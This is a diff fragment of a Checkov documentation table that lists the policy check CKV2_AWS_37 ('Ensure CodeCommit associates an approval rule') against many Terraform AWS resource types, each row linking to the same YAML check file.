+|  610 | CKV2_AWS_37     | resource | aws_apigatewayv2_integration                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  611 | CKV2_AWS_37     | resource | aws_apigatewayv2_integration_response                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  612 | CKV2_AWS_37     | resource | aws_apigatewayv2_model                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  613 | CKV2_AWS_37     | resource | aws_apigatewayv2_route                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  614 | CKV2_AWS_37     | resource | aws_apigatewayv2_route_response                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  615 | CKV2_AWS_37     | resource | aws_apigatewayv2_stage                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  616 | CKV2_AWS_37     | resource | aws_apigatewayv2_vpc_link                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  617 | CKV2_AWS_37     | resource | aws_app_cookie_stickiness_policy                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  618 | CKV2_AWS_37     | resource | aws_appautoscaling_policy                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  619 | CKV2_AWS_37     | resource | aws_appautoscaling_scheduled_action                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  620 | CKV2_AWS_37     | resource | aws_appautoscaling_target                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  621 | CKV2_AWS_37     | resource | aws_appmesh_mesh                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  622 | CKV2_AWS_37     | resource | aws_appmesh_route                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  623 | CKV2_AWS_37     | resource | aws_appmesh_virtual_node                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  624 | CKV2_AWS_37     | resource | aws_appmesh_virtual_router                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  625 | CKV2_AWS_37     | resource | aws_appmesh_virtual_service                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  626 | CKV2_AWS_37     | resource | aws_appsync_api_key                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  627 | CKV2_AWS_37     | resource | aws_appsync_datasource                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  628 | CKV2_AWS_37     | resource | aws_appsync_function                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  629 | CKV2_AWS_37     | resource | aws_appsync_graphql_api                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  630 | CKV2_AWS_37     | resource | aws_appsync_resolver                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  631 | CKV2_AWS_37     | resource | aws_athena_database                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  632 | CKV2_AWS_37     | resource | aws_athena_named_query                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  633 | CKV2_AWS_37     | resource | aws_athena_workgroup                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  634 | CKV2_AWS_37     | resource | aws_autoscaling_attachment                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  635 | CKV2_AWS_37     | resource | aws_autoscaling_group                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  636 | CKV2_AWS_37     | resource | aws_autoscaling_lifecycle_hook                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  637 | CKV2_AWS_37     | resource | aws_autoscaling_notification                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  638 | CKV2_AWS_37     | resource | aws_autoscaling_policy                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  639 | CKV2_AWS_37     | resource | aws_autoscaling_schedule                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  640 | CKV2_AWS_37     | resource | aws_backup_plan                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  641 | CKV2_AWS_37     | resource | aws_backup_selection                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  642 | CKV2_AWS_37     | resource | aws_backup_vault                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  643 | CKV2_AWS_37     | resource | aws_batch_compute_environment                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  644 | CKV2_AWS_37     | resource | aws_batch_job_definition                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  645 | CKV2_AWS_37     | resource | aws_batch_job_queue                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  646 | CKV2_AWS_37     | resource | aws_budgets_budget                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  647 | CKV2_AWS_37     | resource | aws_cloud9_environment_ec2                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  648 | CKV2_AWS_37     | resource | aws_cloudformation_stack                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  649 | CKV2_AWS_37     | resource | aws_cloudformation_stack_set                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  650 | CKV2_AWS_37     | resource | aws_cloudformation_stack_set_instance                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  651 | CKV2_AWS_37     | resource | aws_cloudfront_distribution                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  652 | CKV2_AWS_37     | resource | aws_cloudfront_origin_access_identity                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  653 | CKV2_AWS_37     | resource | aws_cloudfront_public_key                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  654 | CKV2_AWS_37     | resource | aws_cloudhsm_v2_cluster                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  655 | CKV2_AWS_37     | resource | aws_cloudhsm_v2_hsm                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  656 | CKV2_AWS_37     | resource | aws_cloudtrail                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  657 | CKV2_AWS_37     | resource | aws_cloudwatch_dashboard                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  658 | CKV2_AWS_37     | resource | aws_cloudwatch_event_permission                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  659 | CKV2_AWS_37     | resource | aws_cloudwatch_event_rule                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  660 | CKV2_AWS_37     | resource | aws_cloudwatch_event_target                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  661 | CKV2_AWS_37     | resource | aws_cloudwatch_log_destination                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  662 | CKV2_AWS_37     | resource | aws_cloudwatch_log_destination_policy                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  663 | CKV2_AWS_37     | resource | aws_cloudwatch_log_group                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  664 | CKV2_AWS_37     | resource | aws_cloudwatch_log_metric_filter                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  665 | CKV2_AWS_37     | resource | aws_cloudwatch_log_resource_policy                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  666 | CKV2_AWS_37     | resource | aws_cloudwatch_log_stream                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  667 | CKV2_AWS_37     | resource | aws_cloudwatch_log_subscription_filter                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  668 | CKV2_AWS_37     | resource | aws_cloudwatch_metric_alarm                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  669 | CKV2_AWS_37     | resource | aws_codebuild_project                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  670 | CKV2_AWS_37     | resource | aws_codebuild_source_credential                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  671 | CKV2_AWS_37     | resource | aws_codebuild_webhook                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  672 | CKV2_AWS_37     | resource | aws_codecommit_repository                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  673 | CKV2_AWS_37     | resource | aws_codecommit_trigger                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  674 | CKV2_AWS_37     | resource | aws_codedeploy_app                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  675 | CKV2_AWS_37     | resource | aws_codedeploy_deployment_config                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  676 | CKV2_AWS_37     | resource | aws_codedeploy_deployment_group                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  677 | CKV2_AWS_37     | resource | aws_codepipeline                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  678 | CKV2_AWS_37     | resource | aws_codepipeline_webhook                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  679 | CKV2_AWS_37     | resource | aws_codestarnotifications_notification_rule             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  680 | CKV2_AWS_37     | resource | aws_cognito_identity_pool                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  681 | CKV2_AWS_37     | resource | aws_cognito_identity_pool_roles_attachment              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  682 | CKV2_AWS_37     | resource | aws_cognito_identity_provider                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  683 | CKV2_AWS_37     | resource | aws_cognito_resource_server                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  684 | CKV2_AWS_37     | resource | aws_cognito_user_group                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  685 | CKV2_AWS_37     | resource | aws_cognito_user_pool                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  686 | CKV2_AWS_37     | resource | aws_cognito_user_pool_client                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  687 | CKV2_AWS_37     | resource | aws_cognito_user_pool_domain                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  688 | CKV2_AWS_37     | resource | aws_config_aggregate_authorization                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  689 | CKV2_AWS_37     | resource | aws_config_config_rule                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  690 | CKV2_AWS_37     | resource | aws_config_configuration_aggregator                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  691 | CKV2_AWS_37     | resource | aws_config_configuration_recorder                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  692 | CKV2_AWS_37     | resource | aws_config_configuration_recorder_status                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  693 | CKV2_AWS_37     | resource | aws_config_delivery_channel                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  694 | CKV2_AWS_37     | resource | aws_config_organization_custom_rule                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  695 | CKV2_AWS_37     | resource | aws_config_organization_managed_rule                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  696 | CKV2_AWS_37     | resource | aws_cur_report_definition                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  697 | CKV2_AWS_37     | resource | aws_customer_gateway                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  698 | CKV2_AWS_37     | resource | aws_datapipeline_pipeline                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  699 | CKV2_AWS_37     | resource | aws_datasync_agent                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  700 | CKV2_AWS_37     | resource | aws_datasync_location_efs                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  701 | CKV2_AWS_37     | resource | aws_datasync_location_nfs                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  702 | CKV2_AWS_37     | resource | aws_datasync_location_s3                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  703 | CKV2_AWS_37     | resource | aws_datasync_location_smb                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
